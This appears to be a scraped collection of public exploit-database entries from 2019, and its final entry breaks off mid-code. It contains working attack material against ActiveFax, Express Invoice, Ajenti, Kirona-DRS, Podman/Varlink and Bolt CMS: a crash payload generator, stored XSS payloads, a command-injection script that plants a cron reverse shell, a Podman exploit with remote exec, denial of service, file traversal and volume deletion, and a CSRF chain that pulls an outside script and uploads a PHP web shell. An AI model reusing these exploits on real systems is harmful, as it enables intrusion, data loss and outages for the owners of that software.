ISHACK AI BOT

# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service # Date: 2019-10-12 # Vendor Homepage: https://www.actfax.com/ # Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe # Exploit Author: Achilles # Tested Version: 6.92 # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run python code : ActiveFax_Server.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open ActiveFaxServer.exe # 4.- Open the Pop3 Server Config # 5.- Press New # 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password' # 7.- Press ok Twice # 8.- And you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting # Exploit Author: Debashis Pal # Date: 2019-10-13 # Vendor Homepage: https://www.nchsoftware.com/ # Source: https://www.nchsoftware.com/invoice/index.html # Version: Express Invoice v7.12 # CVE : N/A # Tested on: Windows 7 SP1(32bit) # About Express Invoice v7.12 ============================== Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment. # Vulnerability ================ Persistent Cross site scripting (XSS). # PoC ====== 1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e http://A.B.C.D:96 [Default installation]. 2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script> Save the change. or Under "Items" Items -> Add new item-> Item field: put </script><script>alert('XSS');</script> Save the change. or Under "Customers" Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script> Save the change. or Under "Quotes" Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script> Save the change. 3. Login in authenticated privileged or unprivileged user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute. # Disclosure Timeline ====================== Vulnerability Discover Date: 12-Sep-2019. Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. Submit exploit-db : 14-Oct-2019. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Title: Ajenti 2.1.31 - Remote Code Execution # Author: Jeremy Brown # Date: 2019-10-13 # Software Link: https://github.com/ajenti/ajenti # CVE: N/A # Tested on: Ubuntu Linux #!/usr/bin/python # ajentix.py # # Ajenti Remote Command Execution Exploit # # ------- # Details # ------- # # Ajenti is a web control panel written in Python and AngularJS. # # One can locally monitor executed commands on the server while testing # # $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed) # sending proc connector: PROC_CN_MCAST_LISTEN... sent # Reading process events from proc connector. # Hit Ctrl-C to exit # # Browse over to https://server:8000/view/login/normal to login # # ..... # pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ] # pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ] # # Modified the JSON request username value to be `id` # # pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ] # pid=7516 executed [id ] # pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ] # # *ACK.....* # # Also the login routine times out after 5 seconds (see auth.py), which # makes an interactive shell relatively ephemeral. So, we cron job. # # $ python3 ajentix.py server.ip shell local-listener.ip # Done! # # $ nc -v -l -p 5555 # Listening on [0.0.0.0] (family 0, port 5555) # Connection from server.domain 41792 received! # bash: cannot set terminal process group (18628): Inappropriate ioctl for device # bash: no job control in this shell # nobody@server:/var/spool/cron$ ps # PID TTY TIME CMD # 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker # 18849 ? 00:00:00 sh # 18851 ? 00:00:00 bash # 18859 ? 00:00:00 ps # # # Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32 # # Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c # # import os import sys import ssl import json import urllib.request as request def main(): if(len(sys.argv) < 2): print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0]) print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0]) print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0]) return host = sys.argv[1] cmd = sys.argv[2] if(cmd == 'shell'): if(len(sys.argv) < 4): print("Error: need ip to connect back to for shell") return ip = sys.argv[3] shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`" username = shell else: username = "`" + cmd + "`" body = json.dumps({'username':username, 'password':'test', 'mode':'normal'}) byte = body.encode('utf-8') url = "https://" + host + ":8000" + "/api/core/auth" try: req = request.Request(url) req.add_header('Content-Type', 'application/json; charset=utf-8') req.add_header('Content-Length', len(byte)) request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert except Exception as error: print("Error: %s" % error) return print("Done!") if(__name__ == '__main__'): main()

# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure # Discovered Date: 2019-10-03 # Shodan Search: /opt-portal/pages/login.xhtml # Exploit Author: Ramikan # Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/ # Affected Version: DRS 5.5.3.5 may be other versions. # Tested On Version: DRS 5.5.3.5 on PHP/5.6.14 # Vendor Fix: Unknown # CVE: CVE-2019-17503,CVE-2019-17504 # Category: Web Apps # Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities # Description: # The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure. # Vulnerabiity 1:HTML injection and (CVE-2019-17504) # An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) # vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter. Affected URL: /osm/report/ Affected Parameter: password POST Request: POST /osm/report/ HTTP/1.1 Host: 10.50.3.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 147 Connection: close Referer: https://10.50.3.148/osm/report/ Upgrade-Insecure-Requests: 1 create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!-- Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 14:56:05 GMT Server: Apache X-Powered-By: PHP/5.6.14 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 728 Connection: close Content-Type: text/html;charset=UTF-8 <html> <head> <img src='logo.jpg'> <form method='POST'> <input type='hidden' name='create' value='true'/> <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> <table> <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> </table> </form> </head> </html> GET Request: GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1 Host: vs-kdrs-l-01.selwoodhousing.local User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 14:53:35 GMT Server: Apache X-Powered-By: PHP/5.6.14 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: X-Requested-With XDomainRequestAllowed: 1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 728 Connection: close Content-Type: text/html;charset=UTF-8 <html> <head> <img src='logo.jpg'> <form method='POST'> <input type='hidden' name='create' value='true'/> <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> <table> <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> </table> </form> </head> </html> *************************************************************************************************************************** Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503) *************************************************************************************************************************** An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc. Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd # Request: GET /osm/REGISTER.cmd HTTP/1.1 Host: 10.0.0.148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 03 Oct 2019 09:23:54 GMT Server: Apache Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT ETag: "1fc4-55d612f6cae13" Accept-Ranges: bytes Content-Length: 8132 Connection: close @echo off set DEBUGMAPSCRIPT=TRUE rem rem Find root path and batch name rem root path is found relative to the current batch name rem rem turn to short filename (remove white spaces) for %%i in (%0) do ( set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi set MAPSCRIPTBATCH_FILE=%%~i ) for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do ( set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\.. ) if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR% if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE% rem rem find if we are in INTERRACTIVE mode or not and check the parameters rem if "%1"=="" goto INTERACTIVE goto NONINTERRACTIVE :NONINTERRACTIVE rem non interractive call so catch the parameters from command line rem this is supposed to be called from the root DRS directory if "%2"=="" ( echo Invalid parameter 2 pause goto :EOF ) set ACCOUNT=%2 set STATIC=NO if "%1"=="STATIC" set STATIC=YES if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT% if "%1"=="STATIC" goto GLOBAL if "%1"=="DYNAMIC" goto GLOBAL echo Invalid parameter 1 pause goto :EOF :INTERACTIVE rem Interractive mode : ask for account and static mode if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode echo Open Street Map setup for Xmbrace DRS set /P ACCOUNT=Account name: set /P STATIC=Limited map feature (YES/NO): rem back to the setup directory cd %MAPSCRIPTROOTDIR% rem # READ AND DEFINE SETTINGS for /F "tokens=1,* delims==" %%k in (conf\default.txt) do ( if not "%%k"=="#=" set %%k=%%l ) if exist CUSTOM\CONF\custom.txt ( for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do ( if not "%%k"=="#=" set %%k=%%l ) ) for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do ( if not "%%k"=="#=" set %%k=%%l ) if "%APACHE_USE_SSL%"=="TRUE" ( set DEFAULT_HTTP_PROTOCOL=https set APACHE_USE_SSL_VALUE=true set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT% ) else ( set DEFAULT_HTTP_PROTOCOL=http set APACHE_USE_SSL_VALUE=false set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT% ) goto GLOBAL rem rem good to go in a non interractive mode rem the following is the generic par of the install, whatever we are in static or dynamic mode rem :GLOBAL if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe" echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE) if "%STATIC%"=="YES" goto :STATIC goto :DYNAMIC :STATIC if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section echo map=static > ACCOUNTS\%ACCOUNT%\config.txt echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql if exist req.sql del req.sql goto FINAL :DYNAMIC if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT) echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql if exist req.sql del req.sql goto FINAL :FINAL echo Map registred for %ACCOUNT% if "%1"=="" pause goto :EOF

# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution # Exploit Author: Jeremy Brown # Date: 2019-10-15 # Vendor Homepage: https://podman.io/ # Software Link: dnf install podman or https://github.com/containers/libpod/releases # Version: 1.5.1 # Tested on: Fedora Server 30 #!/usr/bin/python # -*- coding: UTF-8 -*- # # pickletime.py # # Podman + Varlink Insecure Config Remote Exploit # # ------- # Details # ------- # # Podman is container engine / platform similar to Docker supported # by RedHat and Fedora with Varlink being a protocol to exchange # messages, which comes in handy for things like a Remote API. # # Now depending on how Podman and Varlink are deployed, they can be # susceptible to local and remote attacks. There are a few API bugs # in Podman itself, as well as a way to execute arbitary commands if # one can hit Podman via the Remote API. Running Podman with Varlink # over tcp listening either on localhost or the network interface is the # most vulnerable setup, but other ways such as access via the local UNIX # socket or over SSH (key /w no passphrase is common) aren't likely # to be vulnerable unless ACLs or other stuff is broken. # # ------------------ # Testing the issues # ------------------ # # - check; just connects and issues GetInfo() to see if the host is # running a podman service # # - exec; arbitrary cmd execution via ContainerRunlabel() specified # by "run" label in the specified hosted image (self-setup) # # - dos; crash the server via choosing a /random/ selection from # the available parsing bugs in APIs (we like to have fun here) # # - blind; dir traversal in SearchImages() API to force server to # read an arbitrary file (no client-side output) # # - volrm; loops to remove all volumes via VolumeRemove() behavior # # --------- # Exec demo # --------- # # $ ./pickletime.py check podman-host:6000 # -> Podman service confirmed on host # # Then create a Dockerfile with an edgy label, build and host it. # # [Dockerfile] # FROM busybox # LABEL run=“nc -l -p 10000 -e /bin/bash” # # $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run # Done! # # $ nc podman-host 10000 # ps # PID TTY TIME CMD # 111640 pts/1 00:00:00 bash # 111786 pts/1 00:00:00 podman # 111797 pts/1 00:00:00 nc # 111799 pts/1 00:00:00 bash # 111801 pts/1 00:00:00 ps # # # Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64 # # ----------- # Other stuff # ----------- # # Note: admins can really setup their connection and deployment configuration # however they like, so it's hard to say how many folks are 'doing it wrong' # or actually are running with proper auth and hardening in place. Shodan # folks have been contacted about adding support to discover Varlink services # to get more data that way as well. # # Fixed bugs: # - DoS #2 was fixed in 1.5.1 # - Updated security docs / cli flags TBD # # > Why pickles? Why not. # # Dependencies to run this code: # # sudo dnf install -y python3-podman-api # # # import os import sys import socket import subprocess import random import json import podman import pickle import time serviceName = 'io.podman' # service name def main(): if(len(sys.argv) < 2): print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0]) print("Eg: %s check tcp:podman-host:6000" % sys.argv[0]) print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0]) print("Actions: check, exec, dos, blind, volrm\n") return action = sys.argv[1] address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing ip = address.split(':')[1] port = int(address.split(':')[2]) if(action == 'exec'): if(len(sys.argv) < 4): print("Error: need more args for exec") return image = sys.argv[3] # 'source' for pull label = sys.argv[4] isItTime() try: pman = podman.Client(uri=address) except Exception: print("Error: can't connect to host") return if(action == 'check'): result = json.dumps(pman.system.info()) if('podman_version' in result): print("-> Podman service confirmed on host") return print("-!- Podman service was not found on host") elif(action == 'exec'): # # First pull the image from the repo, then run the label # try: result = pman.images.pull(image) # PullImage() except Exception as error: pass # call fails sometimes if image already exists which is *ok* # # ContainerRunlabel() ... but, no library imp. we'll do it live! # method = serviceName + '.' + 'ContainerRunlabel' message = '{\"method\":\"' message += method message += '\",\"parameters\":' message += '{\"Runlabel\":{\"image\":\"' message += image message += '\",\"label\":\"' message += label message += '\"}}}' message += '\0' # end each msg with a NULL byte doSocketSend(ip, port, message) elif(action == 'dos'): #bug = 1 # !fun bug = random.randint(1,2) # fun if(bug == 1): print("one") source = 'test' method = serviceName + '.' + 'LoadImage' message = '{\"method\":\"' message += method message += '\",\"parameters\":' message += '{\"source":\"' message += source message += '\"}}' message += '\0' doSocketSend(ip, port, message) # works on 1.4.4, fixed in 1.5.1 if(bug == 2): print("two") reference = 'b' * 238 source = '/dev/null' # this file must exist locally method = serviceName + '.' + 'ImportImage' message = '{\"method\":\"' message += method message += '\",\"parameters\":' message += '{\"reference\":\"' message += reference message += '\",\"source\":\"' message += source message += '\"}}' message += '\0' doSocketSend(ip, port, message) # # blind read of arbitrary files server-side # ...interesting but not particularly useful by itself # # openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7 # lseek(7, 0, SEEK_CUR) = 0 # fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0 # read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672 # close(7) # elif(action == 'blind'): method = serviceName + '.' + 'SearchImages' query = '../../../etc/passwd/' # magic '/' at the end message = '{\"method\":\"' message += method message += '\",\"parameters\":' message += '{\"query\":\"' message += query message += '\"}}' message += '\0' #pman.images.search(query) # unclear why this doesn't work doSocketSend(ip, port, message) # # Not really a bug, but an interesting feature to demo without auth # note: call CreateVolume() a few times beforehand to test the removal # elif(action == 'volrm'): method = serviceName + '.' + 'VolumeRemove' n = 10 # this is probably enough to test, but change as necessary message = '{\"method\":\"' message += method message += '\",\"parameters\":' message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal message += '\0' for _ in range(n): doSocketSend(ip, port, message) time.sleep(0.5) # server processing time print("Done!") # # podman/varlink libaries don't support calling these API calls, so native we must # def doSocketSend(ip, port, message): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) sock.send(message.encode()) except Exception as error: print(str(error)) return finally: sock.close() # # obligatory routine # def isItTime(): tm = time.localtime() p = pickle.dumps('it\'s pickle time!') if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')): print(pickle.loads(p)) else: pass # no dill if(__name__ == '__main__'): main()

# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery # Date: 2019-10-15 # Exploit Author: r3m0t3nu11[Zero-Way] # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.5 # Tested on: Linux # CVE : CVE-2019-17591 # last version # Csrf p0c <html> <body> <head> Bolt v 3.x exploit 0day </head> <h1>Bolt v 3.x csrf -> xss -> rce exploit</h1> <img src =" https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg"> <script> function submitRequest() { Csrf = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/folder\/create", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "parent=&foldername=sss&namespace=files"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ }; JSfuck1(); } } JSfuck1 = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body1 = "filename=aaa&parentPath=sss&namespace=files"; xhr.send(body1); xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ } }; where(); } where = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body2 = "namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg"; xhr.send(body2); } Csrf(); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> JS p0c <script> Token = async () => { var xhr = new XMLHttpRequest(); xhr.open("GET", "\/index.php\/bolt\/files", true); xhr.responseType = "document"; xhr.withCredentials=true; xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ doc = xhr.response; token = doc.getElementsByName("file_upload[_token]")[0].value; upload(token); console.log(token); } }; xhr.send(); } upload = async (csrfToken) =>{ var body = "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" + "Content-Type: text/plain\r\n" + "\r\n" + "<?php system($_GET['test']);?>\r\n" + "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------190530466613268610451083392867\r\n" + "Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" + "\r\n" + token "-----------------------------190530466613268610451083392867--\r\n"; const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867"); xhr.withCredentials = true; xhr.onreadystatechange = async (e) => { if (xhr.readyState === 4 && xhr.status === 200){ Shell(); } }; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } Shell = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; xhr.timeout = 4000; var body1 = "namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg"; xhr.send(body1); bypass(); } bypass = async () => { const xhr = new XMLHttpRequest(); xhr.open("POST", 